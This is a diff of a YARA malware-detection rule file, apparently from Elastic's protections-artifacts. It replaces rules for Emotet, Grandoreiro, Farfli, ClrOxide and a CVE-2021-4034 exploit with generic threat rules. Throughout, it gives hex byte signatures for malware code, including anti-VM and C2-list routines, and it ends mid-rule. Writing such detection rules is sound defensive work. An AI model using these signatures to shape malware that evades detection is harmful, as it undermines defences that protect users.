quality = 75 tags = "FILE, MEMORY" - fingerprint = "c3082cc865fc177d8cbabcfcf9fb67317af5f2d28e8eeb95eb04108a558d80d4" - threat_name = "Windows.Trojan.Grandoreiro" - severity = 100 + fingerprint = "f7736c8920092452ca795583a258ad8b1ffd79116bddde3cff5d06b3ddab31b6" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $antivm0 = { B8 68 58 4D 56 BB 12 F7 6C 3C B9 0A 00 00 00 66 BA 58 56 ED B8 01 00 00 00 } - $antivm1 = { B9 [4] 89 E5 53 51 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 BB 00 00 00 00 B8 01 00 00 00 0F 3F 07 0B } - $xor0 = { 0F B7 44 70 ?? 33 D8 8D 45 ?? 50 89 5D ?? } - $xor1 = { 8B 45 ?? 0F B7 44 70 ?? 33 C3 89 45 ?? } + $a1 = { 55 8B EC 51 53 56 8B 75 08 33 C0 57 8B FE AB AB AB 8B 7D 0C 8B 45 10 03 C7 89 45 FC 3B F8 73 3F 0F B7 1F 53 E8 01 46 00 00 59 66 3B C3 75 28 83 46 04 02 83 FB 0A 75 15 6A 0D 5B 53 E8 E9 45 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Emotet_18379A8D : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_2Bb6F41D : FILE MEMORY { meta: - description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "18379a8d-f1f2-49cc-8edf-58a3ba77efe7" - date = "2021-11-17" - modified = "2022-01-13" - reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Emotet.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827" - logic_hash = "2ad72ce2a352b91a4fa597ee9e796035298cfcee6fdc13dd3f64579d8da96b97" + id = "2bb6f41d-41bb-4257-84ef-9026fcc0ebec" + date = "2024-01-17" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1708-L1728" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "afa060352346dda4807dffbcac75bf07e8800d87ff72971b65e9805fabef39c0" + logic_hash = "7c4e62b69880eb8a901d7e94b7539786e8ac58808df07cb1cbe9ff45efce518e" score = 75 - quality = 75 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "b7650b902a1a02029e28c88dd7ff91d841136005b0246ef4a08aaf70e57df9cc" - severity = 100 + fingerprint = "d9062e792a0b8f92a03c0fdadd4dd651a0072faa3dd439bb31399a0c75a78c21" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 04 33 CB 88 0A 8B C1 C1 E8 08 8D 52 04 C1 E9 10 88 42 FD 88 } + $a1 = { 67 65 74 5F 73 45 78 70 59 65 61 72 } + $a2 = { 73 65 74 5F 73 45 78 70 59 65 61 72 } + $a3 = { 42 72 6F 77 73 65 72 50 61 74 68 54 6F 41 70 70 4E 61 6D 65 } condition: all of them } -rule ELASTIC_Windows_Trojan_Emotet_5528B3B0 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_C54Ed0Ed : FILE MEMORY { meta: - description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "5528b3b0-d4cb-485e-bc0c-96415ec3a795" - date = "2021-11-17" - modified = "2022-01-13" - reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Emotet.yar#L22-L41" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827" - logic_hash = "bb784ab0e064bafa8450b6bb15ef534af38254ea3c096807571c2c27f7cdfd76" + id = "c54ed0ed-9c63-437c-a016-d960bbb83c40" + date = "2024-01-21" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1730-L1747" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "f0f4878cb003371522ed1419984f15fd5049f1adeb8e051b8b51b31b0d620e96" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642" + fingerprint = "1e08706e235d6cf23d9c772e1b67463b3e6261a5155d88762472d892079df0d4" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -86059,630 +86328,581 @@ rule ELASTIC_Windows_Trojan_Emotet_5528B3B0 : FILE MEMORY os = "windows" strings: - $a = { 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66 } + $a = { 81 FA 00 10 00 00 72 1C 48 83 C2 27 4C 8B 41 F8 49 2B C8 48 8D 41 F8 48 83 F8 1F 0F 87 92 00 00 00 49 8B C8 ?? ?? ?? ?? ?? 48 83 63 10 00 33 C0 EB 58 4D 8B CC 4D 8B C7 49 8B D6 48 8B CE FF D0 } condition: all of them } -rule ELASTIC_Windows_Trojan_Emotet_1943Bbf2 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Dbe41439 : FILE MEMORY { meta: - description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "1943bbf2-56c0-443e-9208-cd8fc3b02d79" - date = "2021-11-18" - modified = "2022-01-13" - reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Emotet.yar#L43-L62" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5abec3cd6aa066b1ddc0149a911645049ea1da66b656c563f9a384e821c5db38" - logic_hash = "41838e335b9314b8759922f23ec8709f46e6a26633f3685ac98ada5828191d35" + id = "dbe41439-982d-4897-9007-9ad0f206dc75" + date = "2024-01-21" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1749-L1767" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "64afd2bc6cec17402473a29b94325ae2e26989caf5a8b916dc21952149d71b00" + logic_hash = "288cdc285d024f2b69847e0d49bd4dc1c86a2a6a24a7b4fb248071855ba39a38" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "df8b73d83a50a58ed8332b7580c970c2994aa31d2ac1756cff8e0cd1777fb8fa" - severity = 100 + fingerprint = "f7c94f5bc3897c4741899e4f6d2731cd07f61e593500efdd33b5d84693465dd3" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 66 83 38 5C 74 0A 83 C0 02 66 39 30 75 F2 EB 06 33 C9 66 89 } + $a1 = { 83 E4 F8 83 EC 2C 53 56 8B F1 57 89 74 24 10 8B 46 1C 8B 08 85 C9 74 23 8B 56 2C 8B 3A 8D 04 0F 3B C8 73 17 8D 47 FF 89 02 8B 4E 1C 8B 11 8D 42 01 89 01 0F B6 02 E9 F1 00 00 00 33 DB } condition: all of them } -rule ELASTIC_Windows_Trojan_Emotet_Db7D33Fa : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_51A52B44 : FILE MEMORY { meta: - description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "db7d33fa-e50c-4c59-ab92-edb74aac87c9" - date = "2022-05-09" - modified = "2022-06-09" - reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Emotet.yar#L64-L90" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc" - logic_hash = "e220c112c15f384fde6fc2286b01c7eb9bedcf4817d02645d0fa7afb05e7b593" + id = "51a52b44-025b-4068-89eb-01cdf66efb4e" + date = "2024-01-21" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1769-L1787" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "303aafcc660baa803344bed6a3a7a5b150668f88a222c28182db588fc1e744e0" + logic_hash = "aad1c350f43cf2e0512e085e1a04db6099c568e375423afb9518b1fb89801c21" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd" - severity = 100 + fingerprint = "b10f3a3ceab827482139a9cadbd4507767e4d941191a7f19af517575435a5f70" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $chunk_0 = { 4C 8D 9C 24 ?? ?? ?? ?? 8B C3 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 5D C3 } - $chunk_1 = { 8B C7 41 0F B7 4C 45 ?? 41 8B 1C 8C 48 03 DD 48 3B DE 72 ?? } - $chunk_2 = { 48 8B C4 48 89 48 ?? 48 89 50 ?? 4C 89 40 ?? 4C 89 48 ?? C3 } - $chunk_3 = { 48 8B 45 ?? BB 01 00 00 00 48 89 07 8B 45 ?? 89 47 ?? 4C 8D 9C 24 ?? ?? ?? ?? 8B C3 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 5D C3 } - $chunk_4 = { 48 39 3B 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 40 0F 95 C7 8B C7 49 8B 7B ?? 49 8B E3 5D C3 } - $chunk_5 = { BE 02 00 00 00 4C 8D 9C 24 ?? ?? ?? ?? 8B C6 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5D C3 } - $chunk_6 = { 43 8B 84 FE ?? ?? ?? ?? 48 03 C6 48 3B D8 73 ?? } - $chunk_7 = { 88 02 48 FF C2 48 FF C3 8A 03 84 C0 75 ?? EB ?? } + $a1 = { 40 6A 67 72 72 6C 6E 68 6D 67 65 77 77 68 74 69 63 6F 74 6D 6C 77 6E 74 6A 6A 71 68 72 68 62 74 75 64 72 78 7A 63 72 67 65 78 65 70 71 73 7A 73 75 78 6B 68 6E 79 63 74 72 63 63 7A 6D 63 63 69 63 61 61 68 70 66 } condition: - 4 of them + all of them } -rule ELASTIC_Windows_Trojan_Emotet_D6Ac1Ea4 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_5C18A7F9 : FILE MEMORY { meta: - description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3" - date = "2022-05-24" - modified = "2022-06-09" - reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Emotet.yar#L92-L114" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71" - logic_hash = "9b37940ea8752c6db52d4f09225de0389438c41468a11a7cda8f28b191192ef9" + id = "5c18a7f9-01af-468b-9a63-cfecbeb739d7" + date = "2024-01-21" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1789-L1807" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fd272678098eae8f5ec8428cf25d2f1d8b65566c59e363d42c7ce9ffab90faaa" + logic_hash = "05cea396567ed3e23907dec4e6e3a6629cd1044d9123cde0575a04b73bae6c20" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2" - severity = 100 + fingerprint = "68c9114ac342d527cf6f0cea96b63dfeb8e5d80060572fad2bbc7d287c752d4a" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $calc1 = { C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? } - $pre = { 48 83 EC ( 18 | 28 ) C7 44 24 ?? ?? ?? ?? ?? } - $setup = { 48 8D 05 ?? ?? ?? ?? 48 89 81 ?? ?? ?? ?? } - $post = { 8B 44 24 ?? 89 44 24 ?? 48 83 C4 18 C3 } + $a1 = { 55 8B EC 5D E9 CD 1A 00 00 8B FF 55 8B EC 51 FF 75 08 C7 45 FC 00 00 00 00 8B 45 FC E8 03 1B 00 00 59 C9 C3 8B FF 55 8B EC 51 56 57 E8 6B 18 00 00 8B F0 85 F6 74 1C 8B 16 8B CA 8D 82 90 00 00 } condition: - #calc1>=10 and #pre>=5 and #setup>=5 and #post>=5 + all of them } -rule ELASTIC_Windows_Trojan_Emotet_77C667B9 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Ab01Ba9E : FILE MEMORY { meta: - description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "77c667b9-6895-428f-8735-ba5853d9484d" - date = "2022-11-07" - modified = "2022-12-20" - reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Emotet.yar#L116-L144" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ffac0120c3ae022b807559e8ed7902fde0fa5f7cb9c5c8d612754fa498288572" - logic_hash = "f11769fe5e9789b451e8826c5fd22bde5b3eb9f7af1d5fec7eec71700fc1f482" + id = "ab01ba9e-01e6-405b-8aaf-ae06a8fe2454" + date = "2024-01-21" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1809-L1829" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2b237716d0c0c9877f54b3fa03823068728dfe0710c5b05e9808eab365a1408e" + logic_hash = "cc8d79950e21270938d2ea7e501c7c8fdbebe92767b48b46bb03c08c377e095b" score = 75 - quality = 75 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "f8fac966f77cd8d6654b8abffbf63d884bd9f0b5d51bfc252004a0d9bd569068" - severity = 100 + fingerprint = "dd9feb5d5756b3d3551ae21982b5e6eb189576298697b7d7d4bd042e4fc4c74f" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $c2_list_1 = { 8B 4B ?? 8B 85 ?? ?? ?? ?? 48 FF C1 48 C1 E1 ?? 89 04 19 8B 43 ?? 8B 8D ?? ?? ?? ?? 48 C1 E0 ?? C1 E9 ?? 66 89 4C 18 ?? } - $c2_list_2 = { 8B 43 ?? 48 8D 0C 80 8B 44 24 ?? 89 44 CB ?? 8B 43 ?? 8B 54 24 ?? 48 8D 0C 80 C1 EA ?? 66 89 54 CB ?? 8B 43 ?? 0F B7 54 24 ?? 48 8D 0C 80 89 54 CB ?? FF 43 ?? } - $c2_list_3 = { 8B 43 ?? 48 FF C0 48 8D 0C 40 8B 85 ?? ?? ?? ?? 48 03 C9 89 04 CB 8B 43 ?? 8B 95 ?? ?? ?? ?? 48 8D 0C 40 C1 EA ?? 48 03 C9 66 89 54 CB ?? 8B 43 ?? 0F B7 95 ?? ?? ?? ?? 48 8D 0C 40 B8 ?? ?? ?? ?? 48 03 C9 89 54 CB ?? FF 43 ?? } - $c2_list_4 = { 8B 43 ?? 48 FF C0 48 8D 0C 40 8B 44 24 ?? 89 04 CB 8B 43 ?? 8B 54 24 ?? 48 8D 0C 40 C1 EA ?? 66 89 54 CB ?? 8B 43 ?? 0F B7 54 24 ?? 48 8D 0C 40 89 54 CB ?? FF 43 ?? } - $c2_list_5 = { 8B 83 ?? ?? ?? ?? 48 8D 0C 80 8B 44 24 ?? 89 44 CB ?? 8B 83 ?? ?? ?? ?? 8B 54 24 ?? 48 8D 0C 80 C1 EA ?? 66 89 54 CB ?? 8B 83 ?? ?? ?? ?? 0F B7 54 24 ?? 48 8D 0C 80 89 14 CB FF 83 ?? ?? ?? ?? } - $c2_list_a = { 8B 83 ?? ?? ?? ?? 83 F8 ?? 73 ?? 48 8D 4C 24 ?? FF 54 C4 ?? 83 7C 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? } - $string_w_1 = { 8B 0B 49 FF C3 48 8D 5B ?? 33 CD 0F B6 C1 66 41 89 00 0F B7 C1 C1 E9 ?? 66 C1 E8 ?? 4D 8D 40 ?? 66 41 89 40 ?? 0F B6 C1 66 C1 E9 ?? 66 41 89 40 ?? 66 41 89 48 ?? 4D 3B D9 72 ?? } - $string_w_2 = { 8B CD 49 FF C3 33 0B 48 8D 5B ?? 0F B6 C1 66 41 89 00 0F B7 C1 C1 E9 ?? 66 C1 E8 ?? 4D 8D 40 ?? 66 41 89 40 ?? 0F B6 C1 66 C1 E9 ?? 66 41 89 40 ?? 66 41 89 48 ?? 4D 3B D9 72 ?? } - $string_a_1 = { 8B 0B 49 FF C3 48 8D 5B ?? 33 CD 41 88 08 0F B7 C1 C1 E9 ?? 66 C1 E8 ?? 4D 8D 40 ?? 41 88 40 ?? 41 88 48 ?? 66 C1 E9 ?? 41 88 48 ?? 4D 3B D9 72 ?? } - $key_1 = { 45 33 C9 4C 8B D0 48 85 C0 74 ?? 48 8D ?? ?? 4C 8B ?? 48 8B ?? 48 2B ?? 48 83 ?? ?? 48 C1 ?? ?? 48 3B ?? 49 0F 47 ?? 48 85 ?? 74 ?? 48 2B D8 42 8B 04 03 } + $a1 = { 53 3C 3B 54 24 38 74 23 45 3B 6C 24 2C } + $a2 = { 3A 3D 3B 47 3B 55 3B 63 3B 6A 3B 7A 3B } + $a3 = { 56 30 61 30 6B 30 77 30 7C 30 24 39 32 39 37 39 41 39 4F 39 5D 39 64 39 75 39 } condition: - (1 of ($string_*)) and (($key_1 or (1 of ($c2_list*))) or (1 of ($c2_list*))) + all of them } -rule ELASTIC_Windows_Trojan_Emotet_8B9449C1 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_917D7645 : FILE MEMORY { meta: - description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "8b9449c1-41a3-4f4d-b654-6921f2742b9a" - date = "2022-11-09" - modified = "2022-12-20" - reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Emotet.yar#L146-L166" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ffac0120c3ae022b807559e8ed7902fde0fa5f7cb9c5c8d612754fa498288572" - logic_hash = "5501354ebc1d97fe5ce894d5907adb29440f557f2dd235e1e983ae2d109199a2" + id = "917d7645-f13e-4d66-ab9e-447a19923ab7" + date = "2024-01-21" + modified = "2024-02-08" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1831-L1849" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "19b54a20cfa74cbb0f4724155244b52ca854054a205be6d148f826fa008d6c55" + logic_hash = "65748ff2e4448f305b9541ea9864cc6bda054d37be5ed34110a2f64c8fef30c7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ff15cec5eb41bb9637b570d717151cdc076e88a7b4c3d1c31157d41fe7569318" - severity = 100 + fingerprint = "557b459c07dc7d7e32cac389673d5ab487d1730de20a9ec74ae9432325d40cd2" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $hash_1 = { 8B CB 41 8B D0 D3 E2 41 8B CB D3 E0 03 D0 41 0F BE ?? 03 D0 41 2B D0 49 FF ( C1 | C2 ) } - $hash_2 = { 44 8B ?? 44 8B ?? 41 8B CB 41 D3 ?? 8B CB D3 E0 8B C8 8D 42 ?? 66 83 F8 ?? 0F B7 C2 77 ?? 83 C0 ?? 41 2B ?? 41 03 ?? 03 C1 49 83 ?? ?? 41 0F B7 } + $a1 = { 83 E4 E0 56 57 53 81 EC D4 0A 00 00 8B D9 8B F2 BA 1D 00 00 00 FF 73 1C 8D 8C 24 BC 0A 00 00 E8 19 A1 02 00 6A 00 FF B4 24 BC 0A 00 00 8D 8C 24 A8 0A 00 00 E8 D4 06 03 00 8D 8C 24 B8 } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Farfli_85D1Bcc9 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_7A09E97D : FILE MEMORY { meta: - description = "Detects Windows Trojan Farfli (Windows.Trojan.Farfli)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "85d1bcc9-c3c7-454c-a77f-0e0de933c4c3" - date = "2022-02-17" - modified = "2022-04-12" + id = "7a09e97d-ccab-48d7-80d3-d76253a4d7e2" + date = "2024-01-21" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Farfli.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e3e9ea1b547cc235e6f1a78b4ca620c69a54209f84c7de9af17eb5b02e9b58c3" - logic_hash = "746eb5a2583077189d82d1a96b499ff383f31220845bd8a6df5b7a7ceb11e6fb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1851-L1869" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c0c1e333e60547a90ec9d9dac3fc6698b088769bc0f5ec25883b2c4d1fd680a9" + logic_hash = "b65b2d12901953c137687a7b466c78e0537a2830c37a4cb13dd0eda457bba937" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "56a5e4955556d08b80849ea5775f35f5a32999d6b5df92357ab142a4faa74ac3" - severity = 100 + fingerprint = "3302bbee32c9968d3131277f4256c5673bec6cc64c1d820a32e66a7313387415" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { AB 66 AB C6 45 D4 25 C6 45 D5 73 C6 45 D6 5C C6 45 D7 25 C6 45 } + $a1 = { 28 00 00 06 2A 3A FE 09 00 00 FE 09 01 00 6F 8D 00 00 0A 2A 00 4A FE 09 00 00 FE 09 01 00 FE 09 02 00 6F 8E 00 00 0A 2A 00 1E 00 28 43 00 00 06 2A 5A FE 09 00 00 FE 09 01 00 FE 09 02 00 FE 09 } condition: all of them } -rule ELASTIC_Windows_Hacktool_Clroxide_D92D9575 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Dc4Ede3B : FILE MEMORY { meta: - description = "Detects Windows Hacktool Clroxide (Windows.Hacktool.ClrOxide)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "d92d9575-9ad9-464f-95a3-8e100666d7fa" - date = "2024-02-29" - modified = "2024-03-21" + id = "dc4ede3b-d0c7-4993-8629-88753d65a7ad" + date = "2024-01-21" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_ClrOxide.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3a4900eff80563bff586ced172c3988347980f902aceef2f9f9f6d188fac8e3" - logic_hash = "01bb071e1286bb139c5e1c37e421153ef1b28a5994feeaedf6ad27ad7dade5e9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1871-L1889" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c49f20c5b42c6d813e6364b1fcb68c1b63a2f7def85a3ddfc4e664c4e90f8798" + logic_hash = "c402d5f16f2be32912d7a054b51ab6dafc6173bb5a267a7846b3ac9df1c4c19f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b403acddadc5adb982a9ee0e0513ecd471b728680cc9a6cd8cd8150eb9c02776" - severity = 100 + fingerprint = "8be5afdf2a5fe5cb1d4b50d10e8e2e8e588a72d6c644aa1013dd293c484da33b" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $s1 = "clroxide..primitives..imethodinfo" - $s2 = "clroxide..clr..Clr" - $s3 = "\\src\\primitives\\icorruntimehost.rs" - $s4 = "\\src\\primitives\\iclrruntimeinfo.rs" - $s5 = "\\src\\primitives\\iclrmetahost.rs" - $s6 = "clroxide\\src\\clr\\mod.rs" - $s7 = "__clrcall" + $a1 = { 55 89 E5 83 EC 28 C7 45 FC 00 00 00 00 C7 44 24 18 00 00 00 00 C7 44 24 14 00 00 00 00 C7 44 24 10 03 00 00 00 C7 44 24 0C 00 00 00 00 C7 44 24 08 00 00 00 00 C7 44 24 04 00 00 00 80 8B 45 08 } condition: - 2 of them + all of them } -rule ELASTIC_Linux_Exploit_CVE_2021_4034_1C8F235D : FILE CVE_2021_4034 +rule ELASTIC_Windows_Generic_Threat_Bb480769 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2021 4034 (Linux.Exploit.CVE-2021-4034)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "1c8f235d-1345-4d5f-a5db-427dbbe6fc9a" - date = "2022-01-26" - modified = "2022-07-22" + id = "bb480769-57fb-4c93-8330-450f563fd4c6" + date = "2024-01-21" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2021_4034.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "94052c42aa41d0911e4b425dcfd6b829cec8f673bf1245af4050ef9c257f6c4b" - logic_hash = "217df6687076a715712a053672d7b02567a3ee38ce9c0ccf80d23fcfde35592a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L1891-L1909" + license_url = 